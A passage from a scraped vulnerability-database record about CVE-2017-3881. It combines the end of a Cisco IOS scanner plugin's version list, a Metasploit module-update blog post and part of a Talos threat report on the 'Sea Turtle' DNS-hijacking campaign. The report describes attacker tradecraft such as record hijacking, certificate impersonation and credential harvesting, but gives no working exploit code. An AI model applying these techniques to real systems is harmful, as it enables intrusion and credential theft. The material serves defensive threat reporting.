'12.2(25)EWA11',\n '12.2(25)EWA9',\n '12.2(25)EWA2',\n '12.2(25)EWA14',\n '12.2(25)EWA4',\n '12.2(20)EWA3',\n '12.2(25)EWA3',\n '12.2(25)EWA7',\n '12.2(20)EWA4',\n '12.2(25)EWA12',\n '12.2(25)EWA13',\n '12.2(20)EWA2',\n '12.2(35)SE',\n '12.2(18)SE',\n '12.2(20)SE',\n '12.2(25)SE',\n '12.2(37)SE',\n '12.2(53)SE1',\n '12.2(55)SE',\n '12.2(25)SE2',\n '12.2(40)SE2',\n '12.2(46)SE',\n '12.2(46)SE2',\n '12.2(50)SE2',\n '12.2(35)SE5',\n '12.2(50)SE1',\n '12.2(44)SE2',\n '12.2(20)SE3',\n '12.2(35)SE1',\n '12.2(50)SE5',\n '12.2(44)SE1',\n '12.2(53)SE',\n '12.2(37)SE1',\n '12.2(25)SE3',\n '12.2(35)SE3',\n '12.2(44)SE4',\n '12.2(55)SE3',\n '12.2(55)SE2',\n '12.2(40)SE',\n '12.2(44)SE',\n '12.2(52)SE',\n '12.2(58)SE',\n '12.2(50)SE3',\n '12.2(55)SE1',\n '12.2(35)SE2',\n '12.2(18)SE1',\n '12.2(40)SE1',\n '12.2(20)SE1',\n '12.2(44)SE6',\n '12.2(44)SE3',\n '12.2(53)SE2',\n '12.2(52)SE1',\n '12.2(46)SE1',\n '12.2(20)SE2',\n '12.2(54)SE',\n '12.2(44)SE5',\n '12.2(50)SE4',\n '12.2(50)SE',\n '12.2(20)SE4',\n '12.2(58)SE1',\n '12.2(55)SE4',\n '12.2(58)SE2',\n '12.2(55)SE5',\n '12.2(55)SE6',\n '12.2(55)SE7',\n '12.2(55)SE8',\n '12.2(55)SE9',\n '12.2(55)SE10',\n '12.2(55)SE11',\n '12.1(14)AZ',\n '12.2(20)EU',\n '12.2(20)EU1',\n '12.2(20)EU2',\n '12.2(20)EX',\n '12.2(44)EX',\n '12.2(40)EX3',\n '12.2(40)EX',\n '12.2(52)EX',\n '12.2(44)EX1',\n '12.2(40)EX2',\n '12.2(40)EX1',\n '12.2(55)EX',\n '12.2(46)EX',\n '12.2(52)EX1',\n '12.2(55)EX1',\n '12.2(55)EX2',\n '12.2(55)EX3',\n '12.2(58)EX',\n '12.2(25)SEB',\n '12.2(25)SEB2',\n '12.2(25)SEB1',\n '12.2(25)SEB4',\n '12.2(25)SEB3',\n '12.2(25)SEA',\n '12.2(25)EY',\n '12.2(46)EY',\n '12.2(55)EY',\n '12.2(25)EY1',\n '12.2(53)EY',\n '12.2(25)EY3',\n '12.2(37)EY',\n '12.2(25)EY2',\n '12.2(25)EY4',\n '12.2(25)EZ',\n '12.2(25)EZ1',\n '12.2(58)EZ',\n '12.2(53)EZ',\n '12.2(55)EZ',\n '12.2(60)EZ4',\n '12.2(60)EZ5',\n '12.2(25)SEC',\n '12.2(25)SEC2',\n '12.2(25)SEC1',\n '12.2(31)SG',\n '12.2(25)SG',\n '12.2(37)SG',\n '12.2(44)SG',\n '12.2(50)SG3',\n '12.2(31)SG1',\n '12.2(53)SG',\n '12.2(31)SG3',\n '12.2(50)SG6',\n '12.2(53)SG1',\n '12.2(46)SG',\n '12.2(25)SG1',\n '12.2(53)SG2',\n '12.2(50)SG5',\n '12.2(37)SG1',\n '12.2(53)SG3',\n '12.2(50)SG8',\n '12.2(25)SG3',\n '12.2(50)SG2',\n '12.2(40)SG',\n '12.2(25)SG2',\n '12.2(54)SG1',\n '12.2(44)SG1',\n '12.2(50)SG1',\n '12.2(52)SG',\n '12.2(54)SG',\n '12.2(31)SG2',\n '12.2(50)SG',\n '12.2(25)SG4',\n '12.2(50)SG7',\n '12.2(53)SG4',\n '12.2(50)SG4',\n '12.2(46)SG1',\n '12.2(53)SG5',\n '12.2(53)SG6',\n '12.2(53)SG7',\n '12.2(53)SG8',\n '12.2(53)SG9',\n '12.2(53)SG10',\n '12.2(53)SG11',\n '12.2(25)FX',\n '12.2(25)FY',\n '12.2(25)SEF',\n '12.2(25)SEF1',\n '12.2(25)SEF2',\n '12.2(25)SEF3',\n '12.2(25)SEE',\n '12.2(25)SEE1',\n '12.2(25)SEE3',\n '12.2(25)SEE4',\n '12.2(25)SEE2',\n '12.2(25)SED',\n '12.2(25)SED1',\n '12.2(31)SGA',\n '12.2(31)SGA3',\n '12.2(31)SGA2',\n '12.2(31)SGA10',\n '12.2(31)SGA5',\n '12.2(31)SGA4',\n '12.2(31)SGA11',\n '12.2(31)SGA6',\n '12.2(31)SGA1',\n '12.2(31)SGA7',\n '12.2(31)SGA8',\n '12.2(31)SGA9',\n '12.2(25)SEG',\n '12.2(25)SEG1',\n '12.2(25)SEG3',\n '12.2(25)FZ',\n '12.2(44)SQ',\n '12.2(44)SQ2',\n '12.2(50)SQ2',\n '12.2(50)SQ1',\n '12.2(50)SQ',\n '12.2(50)SQ3',\n '12.2(50)SQ4',\n '12.2(50)SQ5',\n '12.2(50)SQ6',\n '12.2(50)SQ7',\n '15.0(1)XO1',\n '15.0(1)XO',\n '15.0(2)XO',\n '15.0(1)EY',\n '15.0(1)EY1',\n '15.0(1)EY2',\n '15.0(2)EY',\n '15.0(2)EY1',\n '15.0(2)EY2',\n '15.0(2)EY3',\n '12.2(54)WO',\n '12.2(27)SBK9',\n '15.0(1)SE',\n '15.0(2)SE',\n '15.0(1)SE1',\n '15.0(1)SE2',\n '15.0(1)SE3',\n '15.0(2)SE1',\n '15.0(2)SE2',\n '15.0(2)SE3',\n '15.0(2)SE4',\n '15.0(2)SE5',\n '15.0(2)SE6',\n '15.0(2)SE7',\n '15.0(2)SE8',\n '15.0(2)SE9',\n '15.0(2a)SE9',\n '15.0(2)SE10',\n '15.0(2)SE10a',\n '15.1(1)SG',\n '15.1(2)SG',\n '15.1(1)SG1',\n '15.1(1)SG2',\n '15.1(2)SG1',\n '15.1(2)SG2',\n '15.1(2)SG3',\n '15.1(2)SG4',\n '15.1(2)SG5',\n '15.1(2)SG6',\n '15.1(2)SG7',\n '15.1(2)SG8',\n '15.0(2)SG',\n '15.0(2)SG1',\n '15.0(2)SG2',\n '15.0(2)SG3',\n '15.0(2)SG4',\n '15.0(2)SG5',\n '15.0(2)SG6',\n '15.0(2)SG7',\n '15.0(2)SG8',\n '15.0(2)SG9',\n '15.0(2)SG10',\n '15.0(2)SG11',\n '15.0(2)EX',\n '15.0(2)EX1',\n '15.0(2)EX2',\n '15.0(2)EX3',\n '15.0(2)EX4',\n '15.0(2)EX5',\n '15.0(2)EX6',\n '15.0(2)EX7',\n '15.0(2)EX8',\n '15.0(2a)EX5',\n '15.0(2)EX10',\n '15.0(2)EX11',\n '15.0(2)EX13',\n '15.0(2)EX12',\n '15.2(1)E',\n '15.2(2)E',\n '15.2(1)E1',\n '15.2(3)E',\n '15.2(1)E2',\n '15.2(1)E3',\n '15.2(2)E1',\n '15.2(2b)E',\n '15.2(4)E',\n '15.2(3)E1',\n '15.2(2)E2',\n '15.2(2a)E1',\n '15.2(2)E3',\n '15.2(2a)E2',\n '15.2(3)E2',\n '15.2(3a)E',\n '15.2(3)E3',\n '15.2(3m)E2',\n '15.2(4)E1',\n '15.2(2)E4',\n '15.2(2)E5',\n '15.2(4)E2',\n '15.2(4m)E1',\n '15.2(3)E4',\n '15.2(5)E',\n '15.2(3m)E7',\n '15.2(4)E3',\n '15.2(2)E6',\n '15.2(5a)E',\n '15.2(5)E1',\n '15.2(5b)E',\n '15.2(4m)E3',\n '15.2(3m)E8',\n '15.2(2)E5a',\n '15.2(5c)E',\n '15.2(3)E5',\n '15.2(2)E5b',\n '15.2(4n)E2',\n '15.2(4o)E2',\n '15.2(5a)E1',\n '15.2(4p)E1',\n '15.2(4m)E2',\n '15.2(4o)E3',\n '15.2(4q)E1',\n '15.2(4s)E1',\n '15.2(4s)E2',\n '15.0(2)EZ',\n '15.2(2)SC3',\n '15.2(1)EY',\n '15.0(2)EJ',\n '15.0(2)EJ1',\n '15.2(2)EB',\n '15.2(2)EB1',\n '15.2(2)EB2',\n '15.2(2)EA',\n '15.2(2)EA1',\n '15.2(2)EA2',\n '15.2(3)EA',\n '15.2(4)EA',\n '15.2(4)EA1',\n '15.2(2)EA3',\n '15.2(4)EA3',\n '15.2(5)EA',\n '15.2(4)EA4',\n '15.2(4)EA2',\n '15.2(4)EA5',\n '15.0(2)SQD',\n '15.0(2)SQD1',\n '15.0(2)SQD2',\n '15.0(2)SQD3',\n '15.0(2)SQD4',\n '15.0(2)SQD5',\n '15.2(4)EC1',\n '15.2(4)EC2',\n '15.1(3)SVS',\n '15.1(3)SVT1'\n);\n\nvar workarounds = make_list(\n CISCO_WORKAROUNDS['ios_iosxe_telnet']\n);\n\nvar reporting = make_array(\n 'port' , product_info['port'],\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCvd48893',\n 'cmds' , make_list('show running-config'),\n 'version' , product_info['version']\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n reporting:reporting,\n vuln_versions:version_list\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7community": [{"lastseen": "2017-06-30T22:17:19", "description": "## Metasploit Hackathon\n\nWe were happy to host the very first Metasploit framework open source hackathon this past week in the Rapid7 Austin. Eight Metasploit hackers from outside of Rapid7 joined forces with the in-house team and worked on a lot of great projects, small and large.\n\n@bcook started the hackathon working with @sempervictus on his amazing backlog of framework features, including REX [library](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Frex-socket%2Fpull%2F6>) [improvements](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Frex-socket%2Fpull%2F5>), [UDP sessions](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F7699>), TLS [encrypted sessions](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-payloads%2Fpull%2F208>), and [support for running framework in Rubinius ](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8638>). We had a lot of good chats on how to move forward with bigger features, and our trees have begun to converge more.\n\n@zerosteiner worked on server support for the [Net-ssh library](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Fnet-ssh%2Fnet-ssh>), and gave right after dropped Railgun support for [OSX Meterpreter](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-payloads%2Fpull%2F212>), and gave a [talk on it at BSides Cleveland.](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DkWd331CgxP0>) On the module side, we got the long-awaited DNS injection module from @kingsabri rewritten and enhanced. @bcook worked a lot with @mubix's, whose intense testing and feedback made the module really great. Mubix served a unique role at the hackathon to of testing everyone's ideas and providing a critical eye on usability and reliability in engagements. @bcook also worked with @sure-fire testing public PoC code for CVE-2017-3881 on a variety of Cisco gear, and we were able to convert @artkond's [great research](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Fartkond%2Fcisco-rce%2F>) into another [module PR](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8615>).\n\n@bperry stopped by with his guitar, and worked on [a plugin for the Arachni web scanner](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8618>). In his words, \"This complements the sqlmap plugin well, going from general web app scanning with arachni to full exploitation with sqlmap straight from Metasploit. It's something I've wanted in Metasploit for a while now.\". He also composed [a song for the occasion.](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DdtKF1FkdmSk>)\n\n@bcook worked on a long-awaited [search function for the Metasploit RPC interface](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8606>) while @mubix added [a nifty new plugin](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8612>) that publishes an RSS feed of shells as they come in. While testing various things, @mubix noticed that his database was taking a long time to delete a workspace. @darkbushido took a look and found that we could speed up deleting workspaces by several orders of magnitude by using [a different method](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit_data_models%2Fpull%2F169>).\n\nJoining the hackathon virtually, @oj completed his [PR for an all-new crypto layer](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8625>) for Meterpreter transports, which provides application-layer encryption for sessions independent of the transport used. It also has the nice effect of reducing the size of Windows meterpreter 5-fold!\n\n@bwatters-r7, @hdm, @kernelsmith, @acammack-r7, and @izobashi also worked on a number of interesting projects as well, like a socks5 proxy, automated payload testing, selfhash support, and mimipenguins integration. We will be covering those as the make their way into the PR queue. In total, the hackathon was a great success and we look forward to having another one soon.\n\n## Passwords\n\nIn the continual game of cat and mouse with Windows password storage, [Rogdham](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2FRogdham>) has brought the mice back on top this week. [SQUEEK!](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fi.chzbgr.com%2Ffull%2F7995955456%2Fh7B351141%2F>) Previously, Windows stored hashes using RC4 hashing, but Windows 10 uses AES128. With this update, the hashdump module will work with the AES128 hashes, too.\n\n## [catch yourself before you wrek yourself](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8543>)\n\nNo one likes seg faults while you're trying to be stealthy, so kudos to [tkmru](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Ftkmru>) who added some error handling to our armle reverse_tcp payload. Previously, the payload would segfault if it could not call back. Now, if it fails to call back, it fails silently, because the best kind of failure is the kind no one notices!\n\n## New Modules\n\n_Exploit modules_ _(4 new)_\n\n* [Netgear DGN2200 dnslookup.cgi Command Injection](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fnetgear_dnslookup_cmd_exec>) by SivertPL and thecarterb exploits CVE-CVE-2017-6334\n\n* [Symantec Messaging Gateway Remote Code Execution](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fsymantec_messaging_gateway_exec>) by Mehmet Ince exploits CVE-CVE-2017-6326\n\n* [Easy File Sharing HTTP Server 7.2 POST Buffer Overflow](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Feasyfilesharing_post>) by Marco Rivoli and bl4ck h4ck3r\n\n_Auxiliary and post modules_ _(1 new)_\n\n* [Riverbed SteelHead VCX File Read](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fhttp%2Friverbed_steelhead_vcx_file_read>) by Gregory DRAPERI and h00die\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requsts 4.14.26...4.14.28](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpulls%3Fq%3Dis%3Apr%2Bmerged%3A%25222017-06-09T17%3A52%3A49-05%3A00%2B..%2B2017-06-22T19%3A00%3A32-05%3A00%2522>)\n * [Full diff 4.14.26...4.14.28](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fcompare%2F4.14.26...4.14.28>)\n\nTo install fresh, check out the open-source-only [Nightly Installers](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fwiki%2FNightly-Installers>), or the [binary installers](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload.jsp>) which also include the commercial editions.\n", "cvss3": {}, "published": "2017-06-30T19:09:11", "type": "rapid7community", "title": "Metasploit Wrapup", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-6334", "CVE-2017-3881", "CVE-2017-6326"], "modified": "2017-06-30T19:09:11", "id": "RAPID7COMMUNITY:4CB1CCDD44A4FB09DC4B102A48D23618", "href": "https://community.rapid7.com/community/metasploit/blog/2017/06/30/metasploit-wrapup", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2019-04-24T16:19:06", "description": "[![](https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s640/image2.jpg)](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)\n\n \n \n_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney ](<https://twitter.com/kpyke>)and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._ \n_ \n_ \n_Update 4/18: _A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance \n \n\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how they were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organizations that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. \n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to login to the DNS provider from the client-side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called registrar operators. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third approach to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organization that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n[![](https://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png)](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco integrated Service Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for Website built with Drupal, aka \"Drupalgeddon\"\nAs of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities. \n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observe the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. to evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses are in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary 